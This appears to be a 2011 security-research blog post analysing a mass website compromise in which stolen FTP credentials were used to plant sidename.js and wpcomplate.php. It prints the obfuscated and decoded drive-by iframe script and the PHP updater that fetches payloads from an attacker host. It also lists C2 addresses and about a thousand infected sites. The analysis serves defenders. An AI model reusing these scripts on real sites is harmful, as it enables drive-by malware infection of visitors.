Injection method	SQL injection, error-prune, low success rate. Cannot delete what's been injected. Injections do not change	FTP, total control of files on the website, that's why they can do meshing. Injected script changes often; replaced with new ones
Injected content	Same for all infected websites	Different for every infected website
Exploit domain	A few registered by the attacker	Unlimited randomly generated co.cc domains

For update on infection estimation for followups, follow me or email me directly.

Contents:
1. Mass Meshing Injection Summary
2. Details on the sidename.js incident
3. Detection rates
4. Malicious scripts
5. Installed malware
6. List of 1200 infected websites

[1. Mass Meshing Injection Summary]
We just realized that it's been more than three years since we first talked about Mass SQL Injections to the English media (PC World, Info World, betanews). Time flies...

When our HackAlert backend lights up like a Christmas tree we know something's going on. This time we want to report a new type of mass-scale drive-by download attack that we'll dub "Mass Meshing Injection" to contrast with "Mass SQL Injection." We've been seeing it since mid January of this year and its usage has been on the rise. We believe it's been developed by CreateCSS group.

Mass SQL Injections have been quite the same ever since our initial report in 2008. Basically, a mass-scale SQL injection is launched, injecting a large number of websites with a malicious script or iframe that would cause the browser to load from a malicious site, which can be a hop point to another malicious site, until finally, exploit code is loaded from the exploit site, the browser is exploited, and malware is installed without the victim's knowledge.

We'll be using the recent lizamoon incident to compare the differences between Mass SQL Injections and Mass Mashing Injections. But first we must note here that lizamoon wasn't a typical Mass SQL Injection--it was less infectious than a typical Mass SQL Injection. Two reasons:

A. Instead of injecting iframes or script srcs to have the browser "secretly" load the malicious content, lizamoon's javascript redirected the browser to the final malicious site, and therefore making it easier for visitors to notice the attack.

B. Mass SQL Injections often serve (0day) drive-by downloads, which would automatically install malware without user knowledge. Simply visiting an infected page would result in installation of malware. Instead, Lizamoon served Web-based fake anti-virus scripts, meaning that the user would have to be tricked into downloading the malware to disk and executing it. So instead of doing nothing, the victim has to first "Save As" and then "Run."

Although it doesn't completely resemble a typical Mass SQL Injection attack, lizamoon attracted great attention recently, and therefore we decided to use it here for comparison.

In Mass SQL Injections, scripts or iframes are injected into innocent victim sites, that cause the browser to load malicious content from the "redirectors," which are domains registered by the attacker. In lizamoon's case, there were only a dozen or more redirector domains, most of which were registered by the same person ("James Northone" jamesnorthone@hotmailbox.com) and hosted on the same network.

These redirectors then redirected the browser to a single location, defender-uqko.in, which served the actual attacking javascript that tried to trick the user into downloading and executing the malware.

This linking strategy, adopted by typical Mass SQL Injection attacks, is easy to detect. Security vendors can signature the dozen-or-so redirector domains. The key here is that the redirector domains all belong to the attacker, and the number is small.

So security vendors can simple blacklist these domains forever and not worry about false alarms when these redirector domains "become clean again"--because they won't.

To defeat this, Mass Meshing Injection does the following:

A. Every infected website contains a redirector script in the root directory; in this case it is sidename.js. This is an obfuscated script that will dynamically generate an iframe to the exploit server, in this case, frankieeus.ru, gaufridboris.ru, stephanos.ru, all hosted on the same IP 89.208.149.214. It runs the BlackHole exploit and serves drive-by downloads.

B. Every infected website is injected, in their pages, with a <script src tag pointing to another random infected website's sidename.js.

And so the end result is, side the infected webpages, there is no more statically injected "malicious redirectors" that security vendors can detect. Every redirector is itself an infected domain, which means blacklisting becomes more difficult and prune to false alerts. Fortunately for this time, the name of the redirector file is still fixed--sidename.js--which can be signatured. If in the future this further changes to a dynamically generated name, detection will be made even more difficult. Details on this can be found in [3. Detection rates].

[2. Details on the sidename.js incident]

A. Mass Meshing Injection first appeared: Mid Jan, 2011

B. Sidename.js (paired with wpcomplate.php) attack first appeared: June 7th, 2011
(Note: Above date as detected by HackAlert, later we confirmed via victim's FTP logs:

Tue Jun 07 17:22:33 2011 0 93.120.87.2 0 /home/___masked___/public_html/sidename.js

)
Changed to cssminibar.js (paired with wpqonfig.php): June 19th, 2011

Sun Jun 19 21:58:55 2011 0 84.247.61.24 0 /home/___masked___/public_html/cssminibar.js

C. Infection mechanism: Automated FTP via stolen credentials. Note that when we googled for mass SQL injected pages, the results we get are those that have failed rather than succeeded. The injection failed, the injected script becomes a part of the pages' content, and indexed by Google. This sidename.js attack has been quite precise, so Google doesn't pick up much.

D. Exploit: served by the Black Hole exploit pack.

At first, running on several domains, including:

frankieeus.ru
gaufridboris.ru, and
stephanos.ru, which all points to the same IP 89.208.149.214, and also
bogdantevye.ru
jasoncmeyer.ce.ms
act1floral.ce.ms
jwjmusic.cx.cc
act1floral.ce.ms

Afterwards, running on RANDOMLY GENERATED co.cc domains.

Script responsible for random co.cc domains is:

http://klubnika34his.com/data/script.php

Every time this script is run, it generates a new, random co.cc domain:

Start Mon, 20 Jun 2011 11:08:50 +0200http://nktnnkr.co.cc/showthread.php?t=51650812Работу закончил Mon, 20 Jun 2011 11:09:12 +0200

The above content is then used to generate the obfuscated script that is written to banner.txt to be subsequently loaded by wpcomplate.php (wpqonfig.php) and written to sidename.js (cssminibar.js).

E. Update mechanism: Three update mechanisms have been continuously observed,

1. The injected <script src=> tag have been continuously changing, meaning, the mesh is dynamic, Site A scripts to site B one day, and to site C the next day. This also indicates that the attacker has an automated backdoor into the infected websites.

2. The sidename.js file itself keeps on changing. Every infected site contains a wpcomplate.php file, which copies content from klubnika34his.com/data/banner.txt.

3. Contents of banner.txt also changes every time script.php is run (as mentioned above). script.php dynamically generates a new, random co.cc domain and then updates banner.txt.

The attacker runs a C++ Builder- or Delphi-based windows program that uses Indy components to trigger (via HTTP) wpcomplate.php (wpqonfig.php), which then retrieves the content of banner.txt and updates sidename.js (cssminibar.js).

This URL documents the updates history:

http://klubnika34his.com/data/time.txt

Excerpts of the content is as follows:

Старт Wed, 15 Jun 2011 03:22:01 +0200 - Работу закончил Wed, 15 Jun 2011 03:22:23 +0200/nСтарт Wed, 15 Jun 2011 03:26:19 +0200 - Работу закончил Wed, 15 Jun 2011 03:26:41 +0200/nСтарт Wed, 15 Jun 2011 03:27:03 +0200 - Работу закончил Wed, 15 Jun 2011 03:27:25 +0200/nСтарт Wed, 15 Jun 2011 03:27:46 +0200 - Работу закончил Wed, 15 Jun 2011 03:28:09 +0200/nСтарт Wed, 15 Jun 2011 03:48:39 +0200 - Работу закончил Wed, 15 Jun 2011 03:49:02 +0200/nСтарт Wed, 15 Jun 2011 04:09:04 +0200 - Работу закончил Wed, 15 Jun 2011 04:09:27 +0200/nСтарт Wed, 15 Jun 2011 04:29:28 +0200 - Работу закончил Wed, 15 Jun 2011 04:29:50 +0200/nСтарт

[3. Detection rates]
The following illustrates why Mass Meshing Infection makes detection more difficult. After typical Mass SQL Injections, each infected site is injected with a static URL (javascript src) to a malicious redirector. The number of URLs is small, and their domains are mostly registered by the attacker.

After a Mass Meshing Injection, each site is injected with a static URL to a different infected website. Therefore the number of URL is equivalent to the number of infected sites, which is much larger. At the same time, domains of these URLs are legitimate, innocent, but infected domains, rather than those registered by an attacker, and therefore detection is harder.

Even if vendors do detect all these infected sites and add them to blacklist, the effort is greater, because usually when maliciously registered domains are added to blacklist, they stay there for a long time. But when innocent but infected domains are added to blacklists, care must be made to monitor and remove them from blacklisting quickly, and so as to not cause false alarms.

What's interesting here though, is Website reputation services versus Antiviruses. Reputation services don't need to be that real-time, and therefore they can afford to blacklist a website for a longer time. And it's fair. You were injected, and so you are less trustworthy.

For antiviruses, though, ideally when the website is fixed, they should be removed from the blacklisting. However, as mentioned above, this will require more effort.

Another interesting note is a lot of infected sites of this "sidename.js" incident were already blacklisted by many. This is because many of these websites tend to fall victim to attacks all the time, old and new. Many of this time's victims have malicious files named adv.php, facebook.php, counter.js, js.php, etc, which were left there as a result of previous compromises.

For those URLs we listed in the [6. List of 1200 infected websites] section, Google flagged roughly 20% of all the sample URLs based on this sidename.js Mass Meshing Injection attack. Another 10% was either already blacklisted due to past attacks or recent ones, both of which had nothing to do with Mass Meshing Injection.

And so using the 1200 URL samples and Google blacklisting as an example, 70% of the infected sites were not flagged, 20% were flagged due to Mass Meshing Injection (sidename.js), and another 10% was either already flagged a long time ago, or was flagged recently due to other compromises. (So this 10% of websites had multiple compromises)

From a scan of Alexa's top one million sites, 125 have been infected. A reasonable estimation of the total number of infected sites would be 125 / 1M * 294M active websites (netcraft survey) = 36,625. Our initial estimate was between 20,000 to 30,000 sites, and so this number is close. Note that this is a solid list with the exact proof of the infection, and that the number is of individual websites (domains) and not individual pages. This is compared to the roughly 5,600 Lizamoon infections and the roughly 62,000 Gumblar infections, both estimated by Google, and also the 1154 unique Lizamoon compromised websites as seen by Cisco "throughout the entire seven month run of these (Lizamoon) SQL injection attacks. Quoted from Wikipedia regarding Lizamoon:

"According to Niels Provos, a security researcher at Google, Google's safe browsing database indicates the Lizamoon attacks began around September 2010 and peaked in October 2010 with approximately 5600 infected sites." (reference)

"Cisco researcher Mary Landesman has confirmed that the infection rate appears quite low." (reference)

Below is an illustration given by Niels Provos in his above-mentioned article.

So again the quick summary:

	Lizamoon	Sidename.js
Type of attack	Mass SQL Injection	Mass Meshing Injection
Victim criteria	Victims have to be tricked into a) downloading a binary and b) executing the binary, in order to be infected.	Victims visit the website and are infected without their knowledge, no clicking required (drive-by download)
Number of infected sites	Google: 5600 Cisco: 1154 Throughout 7 months	20,000-30,000 Will post exact estimation number soon June 7th to now, 8 days
Google blacklisting rate	Don't know	20%, made difficult due to mass meshing
Blacklisting	Easy, because most redirectors are maliciously registered, so they can be blacklisted forever	Harder, because redirectors are infected but otherwise legitimate websites, and so they must be removed from blacklisting once cleaned..
Injection method	SQL injection, error-prune, low success rate. Cannot delete what's been injected. Injections do not change	FTP, total control of files on the website, that's why they can do meshing. Injected script changes often; replaced with new ones
Injected content	Same for all infected websites	Different for every infected website
Injected content	Same for all infected websites	Different for every infected website
Exploit domain	A few registered by the attacker	Unlimited randomly generated co.cc domains

We hope to note here that the above writing is not to question the finding of Lizamoon. It's always difficult for the first party that identifies a threat, because time is limited and you must publish quickly in order for the report to be useful, and therefore it is very difficult to get all the numbers right. We know this drill very well. It's easier to come up with more accurate numbers post-mortum, when there's no time pressure.

[4. Malicious scripts]

For website admins, infected pages contain the following:

<script type="text/javascript" src="http://cartrust.net/sidename.js"></script>

Where "cartrust.net" can be an arbitrary infected website.

Two files are injected into the root foler: sidename.js and wpcomplate.php

Sidename.js doesn't always generate an iframe to the exploit server. When it doesn't, it generates a hidden iframe to google. Following is its contents when it does attack:

el=document.createElement("div");el.innerHTML="ReferenceErr";el.appendChild(document.createTextNode("q"));el.insertBefore(document.createTextNode("l"),el.childNodes[1]);try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.firstChild.nodeValue+a.toString().substr(0,0);};ar="Er(ufd31i.wam<)g [TsnBle]bcv?N9 =\"{0/};2p'4hy,t>C:Ao56";ar2="R64c0c-32c-16c108c-116c12c184c-100c-92c36c44c-12c104c-148c24c32c92c-184c88c4c-44c44c-12c104c-108c8c92c-104c-28c16c56c-72c4c44c-84c156c-64c104c-184c156c-12c-108c12c72c-44c-40c80c-72c0c0c-32c-16c-12c40c4c44c-88c4c48c96c-88c0c84c-24c-32c-4c-12c16c32c12c-72c0c0c-44c184c-100c-92c36c44c-12c104c-148c4c-36c28c152c-92c-84c124c-80c-20c-16c-12c40c4c44c32c-48c-72c100c24c36c8c12c0c-24c36c-52c0c-84c-16c-32c4c-12c28c-12c80c104c-200c28c44c-40c-32c8c132c-128c188c-200c8c36c-12c124c12c-12c-48c72c-24c-32c-108c80c112c-196c76c-68c96c-16c16c48c-64c104c-52c-128c180c0c-44c-40c-84c-8c-12c164c-12c-44c36c-136c112c24c-40c48c-80c-60c28c112c12c-56c36c-136c112c24c-40c-48c108c-8c-88c4c36c36c-56c-76c44c-44c68c-68c56c-56c152c-8c20c-24c-140c-12c0c72c-12c72c8c44c-128c-44c152c-152c172c-124c116c-152c56c-24c128c-116c-76c172c-92c60c-64c4c-76c168c12c-56c12c32c20c-44c36c-56c12c12c24c-136c92c-112c-16c-12c40c4c44c96c-56c-76c96c-88c0c84c-84c0c-48c-4c68c24c80c-152c172c-124c44c-92c-16c-12c40c4c44c-88c4c48c80c-72c0c0c44c-64c-40c120c-108c108c4c-4c-104c184c-100c-92c36c44c-12c104c-148c68c-100c88c-48c140c-92c-92c88c4c-44c44c-12c104c-176c156c-132c-16c-12c40c4c44c72c-108c96c-136c20c40c16c92c16c-16c0c-180c28c68c-88c172c-92c-84c156c-88c-72c100c60c16c-16c8c12c0c-24c36c-52c0c-84c-16c-32c4c-12c28c-12c80c104c-200c28c44c-40c-32c8c132c-128c188c-200c8c36c-12c124c12c-12c-48c72c-24c-32c-108c80c112c-196c76c-68c96c-16c16c48c-64c104c-52c-128c180c0c-44c-108c96c-136c20c40c108c-8c-88c4c-56c72c-76c44c-44c68c-68c56c-56c152c-8c-48c36c8c-140c-12c0c72c-12c84c-12c-136c20c40c108c-8c-88c4c-56c124c44c-128c-44c152c-152c172c-124c48c36c-120c56c-24c128c-116c-76c172c-92c72c-12c-136c20c40c108c-8c-88c4c-56c52c4c-76c168c-56c36c-24c24c-12c-136c20c40c108c-8c-88c4c-56c148c20c-44c-32c36c-24c24c-12c-136c20c40c16c92c16c-16c0c-180c28c68c-88c172c-92c-84c156c-124c-8c-12c164c-12c-8c16c-16c-136c112c24c-108c96c-136c20c40c16c92c16c-16c0c-180c28c68c-88c172c-92c-84c156c8c-80c-60c28c112c12c-20c16c-16c-136c112c24c-108c96c-88c0c0c-44c184c-100c-92c36c44c-12c104c-148c24c32c92c-184c88c4c-44c44c-12c104c-108c8c92c-104c-28c16c56c-72c4c44c-84c156c-64c104c-184c156c-12c-108c12c72c-44c-60c8c116c0c-68c-12c-60c172c-20c-140c56c-68c-12c8c40c96c-88c0c84";pau="urn eReferenceErr".replace(k,"va"+el.childNodes[1].nodeValue);e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="64";s="";pos=0;i=0;while(i<605){e('po'.concat('s+=par','seInt(k','.rep','lace("R','eferen','","0a','sd"))+','ar2[','i]/','4'));e('s+=ar.substr(pos,1)');i++;}e(s);

Which decodes to:

if (document.getElementsByTagName('body')[0]){   iframer();  } else {   document.write("<iframe src='http://gaufridboris.ru/forum.php?tp=db6fe39c94c52155' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");  }  function iframer(){   var f = document.createElement('iframe');f.setAttribute('src','http://gaufridboris.ru/forum.php?tp=db6fe39c94c52155');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');   document.getElementsByTagName('body')[0].appendChild(f);  }

The contents of the wpcomplate.php file is as follows:

<?php// ----------------------------------------------------------------------// touch this!  ---------------------------------------------------------define( 'CACHE_DEBUG',false );define( 'CACHE_TIME_SECONDS',0 );define( 'CACHE_UPDATE_URL',"http://klubnika34his.com/data/banner.txt" );define( 'CACHE_FILE',"sidename.js" );// ----------------------------------------------------------------------$cache_code  = null;$cache_file  = CACHE_FILE;$cached_time  = time() - (file_exists($cache_file) ? filemtime($cache_file) : 0);// ----------------------------------------------------------------------if (CACHE_DEBUG) echo "Cached time is {$cached_time} seconds, update planned after ".(CACHE_TIME_SECONDS - $cached_time)." seconds\n";// ----------------------------------------------------------------------// check cached time if($cached_time > CACHE_TIME_SECONDS){ // get new cache code $cache_code = file_get_contents(CACHE_UPDATE_URL); if(!empty($cache_code)) {  if (CACHE_DEBUG) echo "Update cache...\n";  write_cache($cache_file, $cache_code); } else {  if (CACHE_DEBUG) echo "Can't get cache data!\n"; }}else{  if(CACHE_DEBUG) echo "Read cache code...\n";  // extract cached data  $cache_code = extract_cache($cache_file);  if(empty($cache_code))  {   if (CACHE_DEBUG) echo "Cache empty! Update cache...\n";   $cache_code = file_get_contents(CACHE_UPDATE_URL);   if(!empty($cache_code))   {    // write cache    write_cache($cache_file, $cache_code);   }   else   {    if (CACHE_DEBUG) echo "Can't get cache data!\n";   }  }}// ----------------------------------------------------------------------header("Content-Type: text/plain; charset=windows-1251");echo $cache_code;// ----------------------------------------------------------------------exit;// ----------------------------------------------------------------------/// read file datafunction file_get_contents_locked($file_path){ $fp = fopen($file_path, "r"); if($fp !== FALSE) {  flock($fp, LOCK_EX);  $data = fread($fp, filesize($file_path));  flock($fp, LOCK_UN);  fclose($fp);  return $data; } return FALSE;}// ----------------------------------------------------------------------/// extract cache from file by cache markersfunction extract_cache($file_path){ if(file_exists($file_path))  return file_get_contents_locked($file_path); return null;}// ----------------------------------------------------------------------// write cache to filefunction write_cache($file_path, $cache_data){ if(file_exists($file_path) && !is_writable($file_path)) {  if (CACHE_DEBUG) echo "Cache file not writable!\n";  return null; } $fp=fopen($file_path, "w+"); flock($fp, LOCK_EX); fwrite($fp, $cache_data); flock($fp, LOCK_UN); fclose($fp);}------------

[5. Installed malware]

The installed malware binary keeps on changing, but most are repacked versions of the same backdoor and spambot. Detection rate was 3 out of 42 vendors on VirusTotal.

The malware connects back to 70.36.100.242:443 and listens on port 2455. Static analysis also came up with the following domains:

70.36.100.242:443;
70.36.100.243:443;
70.36.100.244:443;
208.110.80.34:443;
208.110.80.35:443;
208.110.80.36:443;
74.222.4.12:443;
74.222.4.13:443;
black.nightphantom.com:443;
cheburash.com:443;
ns2.romanspamer.com:443;
n1.romanspamer.com:443;
angel.eveningquest.com:443;

[6. Sample list of 1200 infected websites]

After the initial publicaiton of this post, we were noted by
Christian Frichot and David Taylor that apparantly, the meshing system automatically documents infected websites in the following URL:

http://klubnika34his.com/data/workurls.txt

We were not aware of this prior to their update. An excerpt of the URL's contents is as follows:

http://getbig.com/articles/wpcomplate.phphttp://ekudakov.ru/wpcomplate.phphttp://studiodada.biz/wpcomplate.phphttp://woweb.biz/wpcomplate.phphttp://www.metapo.com/wpcomplate.phphttp://teamroomonline.com/wpcomplate.php

After counting, that URL recorded 956 websites, out of which were 897 unique websites. Apparantly this file did not include all infected websites, but since we were not able to collect the entire source code package of this meshing system, we do not know why this file did not record all infections.

Finally, below are examples of sites in this sidename.js mesh.

http://m-ageha.kir.jphttp://embarrass.hosting.paran.comhttp://hosting0013924.az.plhttp://hosting4792140.az.plhttp://hosting8540401.az.plhttp://n3jnondgxfed.az.plhttp://promelit.biz.uahttp://cuoredolcecuore.netsons.orghttp://alicjaa.webd.plhttp://cuda.webd.plhttp://dian560.webd.plhttp://grzenio.webd.plhttp://milena1.webd.plhttp://msmebel8.webd.plhttp://pzukwi.webd.plhttp://snb.webd.plhttp://billardagent.vot.plhttp://dsopen.vot.plhttp://lenin.vot.plhttp://mk1.vot.plhttp://rako.vot.plhttp://tanierodzinnezakupy.vot.plhttp://wojsz.vot.plhttp://wswfit.vot.plhttp://kuzishin.if.uahttp://alfa.sumy.uahttp://getbig.comhttp://zara.zzl.orghttp://www.gazetevan.comhttp://fantazjada.kei.plhttp://articlenext.comhttp://sim-interbusiness.comhttp://formatc.cal.plhttp://grobart.cal.plhttp://kokoko.cal.plhttp://soustr.net78.nethttp://4misr.comhttp://project-soustr.net76.nethttp://muciek2.ayz.plhttp://pkata.ayz.plhttp://1.igor1980.z8.ruhttp://miadieta.ithttp://czasy-surferow.xaa.plhttp://htc.xaa.plhttp://sesatio.xaa.plhttp://sigmainfotech.com.auhttp://spolecznagrodzisk.ehost.plhttp://skt.beta.zst.tarnow.plhttp://media.funmunch.comhttp://quotes.funmunch.comhttp://rank01.comhttp://nmc.poltava.uahttp://saamarth.nethttp://ayamk.comhttp://sagitta.cp5.win.plhttp://konhaber.comhttp://m.dialindia.comhttp://lechowski.nstrefa.plhttp://euslugi.lh.plhttp://listonoszpat.lh.plhttp://idmir.comhttp://newnancc.comhttp://www.zbani.comhttp://websitedesign4u.comhttp://kalisz.ionic.plhttp://dev.inkakinada.comhttp://imagesdocs.comhttp://select.civ.plhttp://konto1.cal24.plhttp://wojo.fc.plhttp://teentape.comhttp://shqipet.chhttp://amcwebhost.comhttp://love-sports-betting.comhttp://easley4dps4.comhttp://mobozavr.u-gu.ruhttp://fitness-planet.turek.plhttp://karczma.turek.plhttp://malodentalimplants.comhttp://gogoa.comhttp://sigmaseo.com.auhttp://yenidze.comhttp://theclassy.comhttp://betterbettingonline.comhttp://nudeamateurporn.comhttp://vija.asiahttp://st05110493.etu.edu.trhttp://serverlar.gen.trhttp://pichell.orghttp://all-celebrities-exposed.comhttp://theleadershipcoach.orghttp://facebooklikes.comhttp://zwierzu.zxy.mehttp://dr-slc.comhttp://main.district8.nethttp://traverus-travelagent.comhttp://cnsbzs.comhttp://kalitewebs.comhttp://admindiscuss.comhttp://kocaeligazete.comhttp://bestfinancescheme.comhttp://purplepjs.comhttp://datapaylasim.comhttp://bankwestagri.com.au.tmp.anchor.net.auhttp://content-catalyst.comhttp://rednotebook.grhttp://artattackk.comhttp://deathntaxes.nethttp://kmetijstvo-gozdarstvo-gorenjske.comhttp://tourism-eure.comhttp://finedecoration.nethttp://conceptsynoptic.comhttp://idealgiftshopping.nethttp://fashionwatchesjewelry.comhttp://myamateurhomeporn.comhttp://anglijospremierlyga.wu.lthttp://utilaje-agricole-wirax.comhttp://sonic-serve.comhttp://versatilecontents.comhttp://ilovefreepussy.comhttp://zee.cohttp://releasedownload.comhttp://clarabridge.comhttp://greenvanlines.comhttp://lsraheja.orghttp://pornwarzone.comhttp://4printing.nethttp://radioisla1320.comhttp://www.apluswhs.comhttp://clientzone.saturn.tjhttp://rainbowlocksmith.comhttp://thai-discovery.comhttp://muraito.comhttp://dentalimplantcosthouston.comhttp://designhub.ithttp://www.cosmed.com.twhttp://artefakt.jor.plhttp://zdjecia.jor.plhttp://starzweb.comhttp://indusnetacademy.comhttp://mardanpalace.comhttp://kanadianking.comhttp://erogry24.firehost.plhttp://falaq.infohttp://tuque.com.brhttp://staah.nethttp://hqlogos.comhttp://hornygirls.bizhttp://ardanradio.comhttp://greener-gardens.comhttp://harmonyfilm.viphost.plhttp://socialmediamarketingwizard.comhttp://bdmc.ushttp://dentalimplantsorangecountydentist.comhttp://wonderbackgrounds.comhttp://selfdirectedirastore.comhttp://internetmarketingwonder.comhttp://arcomserv.comhttp://lilavatihospital.comhttp://jigneshpatel.co.inhttp://picasoconsulting.comhttp://rdfitness-centre.infohttp://iloveretroporn.comhttp://accordsoft.inhttp://casinostoplayat.comhttp://sh.d2.plhttp://countryheartheauclaire.comhttp://forexen-trading.infohttp://swagsaver.comhttp://blackcatcandlecompany.comhttp://mobileshub.co.ukhttp://rdseoservices.infohttp://londoncheapapartments.co.ukhttp://onlinecasinoprime.comhttp://ddiziizlet.comhttp://quickseoservices.comhttp://sqoop.co.ughttp://impactdesign-global.comhttp://gaysexxxvideos.comhttp://seobay.comhttp://craigslistraffic.orghttp://rdrealestate.infohttp://www.ankarahavalari.nethttp://mylitescottages.comhttp://pcmax.vnhttp://thebarninsanford.comhttp://datstruct.comhttp://horizonspeakers.comhttp://gogreenindia.co.inhttp://tamanismailmarzuki.comhttp://malta-festival.plhttp://mancity.czhttp://portalwallpaper.nethttp://tantumjav.nethttp://leimo.bizhttp://oib.gov.trhttp://rhaasoft.inhttp://seo-bright.comhttp://megapic.vnhttp://michaelbaisden.comhttp://passenlaw.comhttp://ICNA.ORGhttp://izeebschool.comhttp://kdaat.orghttp://ocdxxx.comhttp://bestsildenafil.infohttp://re-feel.inhttp://mtss.ushttp://letfollow.ushttp://sssofttechnologiesdev.comhttp://justdriving.nethttp://a1shopping.co.cchttp://australiacampervan.comhttp://dpsvasantkunj.comhttp://rdonline-education.infohttp://effectiveattraction.comhttp://fripjobs.comhttp://planetag.cp9.vpsi.plhttp://thecarverycompany.comhttp://professional-videoeditingsoftware.co.cchttp://healthcarecenters.orghttp://menswearecollection.comhttp://honda.com.sghttp://www.h963.comhttp://thesuperstocks.comhttp://thelinkbuildingservices.comhttp://searchenginefactors.comhttp://businessloanconnections.comhttp://onlinecasinopros.comhttp://area224.comhttp://longshotsaloon.comhttp://www.greivisvasquez.comhttp://rdbusiness-solu.infohttp://supertouchart.comhttp://surprisesgalore.comhttp://swiatmp3.infohttp://makemytoursonline.comhttp://fin-digest.ruhttp://swankwithoutthewank.comhttp://yogasanjivani.comhttp://facebook.gamesbunch.comhttp://gamesbunch.comhttp://zmadz.comhttp://businesshubdirect.comhttp://crosbymolasses.comhttp://wpgezegeni.comhttp://outdoor.org.plhttp://theabundancemovement.comhttp://yenikonya.com.trhttp://www.fernandoandrade.namehttp://giftshopgames.comhttp://myhomefurnituresite.comhttp://www.mzri.comhttp://theseoconsult.comhttp://onlinecasinodeck.comhttp://statho-design.grhttp://trinemt2.comhttp://nokiawindows.co.cchttp://sekolahasisi.nethttp://iredecor.co.cchttp://simpsons-arcade.comhttp://www.cashstreams.nethttp://viphousing.inhttp://autoforumposter.nethttp://espinhonet.comhttp://www.3doi.comhttp://edrx.infohttp://2muchrishtey.comhttp://www.obat-herbal.bizhttp://khao-sok-resort.comhttp://cheapdrugbuy.comhttp://vielja.nlhttp://hardwareshoponline.comhttp://csewdirectory.childrensociety.org.sghttp://wingstechsolutions.comhttp://www.srasid.comhttp://sekretaris.dindikjatim.nethttp://bannermaken.nlhttp://casinodestek.comhttp://myabsworkout.comhttp://xklatovy.lidos.czhttp://tmmteam.nethttp://www.nastyvids.infohttp://khaosok-accommodation.comhttp://prikolkin.com.uahttp://accept-credit-cards.comhttp://mychinese.com.myhttp://missionnewyork.comhttp://vedantainformatics.comhttp://www.charliesheennews.infohttp://adiba.co.cchttp://khaosok-hotels.comhttp://evolucionupc.edu.pehttp://thewebhostingcompany.com.auhttp://turkeyhotelsandtours.comhttp://srishtiprojects.comhttp://kidzfun.bizhttp://seosteptoday.comhttp://www.kombor.comhttp://osiolkowo.xpag.plhttp://konzerttickets.wshttp://videocafe.fungrind.comhttp://sm3.aserw.plhttp://muslimfamilyday.comhttp://wonderfonts.comhttp://fitlion.comhttp://gsm-sms.nethttp://forextradingeducation.infohttp://daftarlowonganpekerjaan.comhttp://www.seguridadsocialsuramericana.comhttp://zdjecia.zebu.plhttp://weddinggamesonline.comhttp://www.singlemomsx.infohttp://www.zarabianiewnecie24.com.plhttp://zarabianiewnecie24.com.plhttp://fanhaber.comhttp://www.livejasminv.infohttp://suaramu.comhttp://playgroundmaps.comhttp://www.dui4m.comhttp://www.tinnitusmiraclev.infohttp://www.mesotheliomav.infohttp://target-marketing.infohttp://totalcardiocards.comhttp://tantiagroup.comhttp://www.mydrivinglessonscork.comhttp://www.djiatoday.infohttp://ukdrills.comhttp://www.egemengazetesi.comhttp://dressupgames.fmhttp://newlink.co.zahttp://amxbans.hmhost.plhttp://weselnyhit.plhttp://labmedick.comhttp://tuttoluciano.ithttp://circuitsmag.comhttp://art.milleniumstudio.plhttp://perih.milleniumstudio.plhttp://quadrapol.milleniumstudio.plhttp://up.milleniumstudio.plhttp://drop-ship-wholesale.nethttp://osiolkowo.euhttp://t4tamil.comhttp://mexipreneur.comhttp://www.floridagas.nethttp://thenextmarket.comhttp://tandaiduong.com.vnhttp://bcans.cahttp://olka.cahttp://kalpkurabiye.comhttp://tab-g.comhttp://traductoresportugues.comhttp://ssyms.comhttp://chasovnik.bghttp://finvista.ruhttp://gigroup.co.inhttp://www.thedietsolutionprogramx.infohttp://www.menopausesymptomsx.infohttp://123racinggames.comhttp://www.careeronestop.infohttp://imyshots.comhttp://nefisyemektarifleri.bizhttp://dizifilmizlesek.nethttp://adventuregamesplay.comhttp://operacionesdigitales.comhttp://webonew.comhttp://www.lampaopt.ruhttp://myazn.comhttp://app.sec-survivals.nlhttp://www.soiodontologia.comhttp://gorodbg.ruhttp://www.eccoshoesonsale.infohttp://glocalizationconference.orghttp://www.headphoneonsale.co.ukhttp://domuka.nethttp://y.ym.lthttp://www.vigrxplusx.infohttp://potuk.nethttp://www.wowherbalismguidex.infohttp://keyifleizle.nethttp://www.amanosmobilya.comhttp://www.onoranzefunebri-italia.ithttp://fairtexbangplee.comhttp://magazin-turov.com.uahttp://anandahouse.synergiahost.plhttp://wnr.synergiahost.plhttp://proxen.plhttp://kemal-sunal.infohttp://www.gpcps.ruhttp://mylinh.com.vnhttp://www.kostums.comhttp://www.floresdelagranja.comhttp://myadventureleague.comhttp://district8.nlhttp://www.lakerabunhotel.comhttp://izleriz.orghttp://otcgenius.comhttp://www.acaiberrypower.nethttp://ideblog.comhttp://ulusanhandmade.comhttp://www.yeniturkedebiyati.comhttp://www.aqiosk.comhttp://www.androidv.infohttp://rembudcentr.com.uahttp://www.broilmastergrills.orghttp://www.virtualplaypoker.comhttp://universalsecret.nethttp://zoneware.nethttp://www.mpsinfoservices.comhttp://casinoruff.comhttp://girlsgames.mehttp://www.krayone.comhttp://www.dsfl.nethttp://www.zakozi.comhttp://schiwarz.comhttp://russe.star-kom.plhttp://3xru.ruhttp://kabarbruno.orghttp://francinasingla.comhttp://cartrust.nethttp://www.ifainsurance.infohttp://hkctf.comhttp://lenen-zonder-bkrtoetsing.nlhttp://e-rinka.lthttp://unicentrotunja.com.cohttp://onlinebiznes.euhttp://www.injurylawyersforyou.infohttp://yukmobi.comhttp://sadinfish.comhttp://www.hnldesigns.comhttp://freedomdive.comhttp://butterflycleaning.cahttp://swiatwyscigow.plhttp://intechnde.comhttp://serbesttasarimci.comhttp://ddcovey.comhttp://www.hemorrhoidmiraclex.infohttp://woweb.bizhttp://mobileshop.com.vehttp://www.swabhimaan-education-ngo.comhttp://stayinstyle.co.nzhttp://tangerangkab.go.idhttp://www.registryeasyreview.infohttp://www.morrobaycarshow.orghttp://adelita.com.uahttp://yiu.ac.thhttp://pizzadomiciliu.rohttp://imadel.orghttp://www.rugusa.infohttp://www.acnenomorev.infohttp://hotrosv.comhttp://stockrose.comhttp://bahcelievlerbilgievi.comhttp://be3group.comhttp://www.iphone4cost.infohttp://www.newonlinepokergames.comhttp://valconsulting.com.pehttp://www.kayhanturkmenoglu.com.trhttp://www.agmorganizasyon.comhttp://rifatozkan.com.trhttp://adfolio.orghttp://phuketgolfvacation.comhttp://www.aryaajans.comhttp://targulbisericesc.euhttp://bircefm.nethttp://jazzab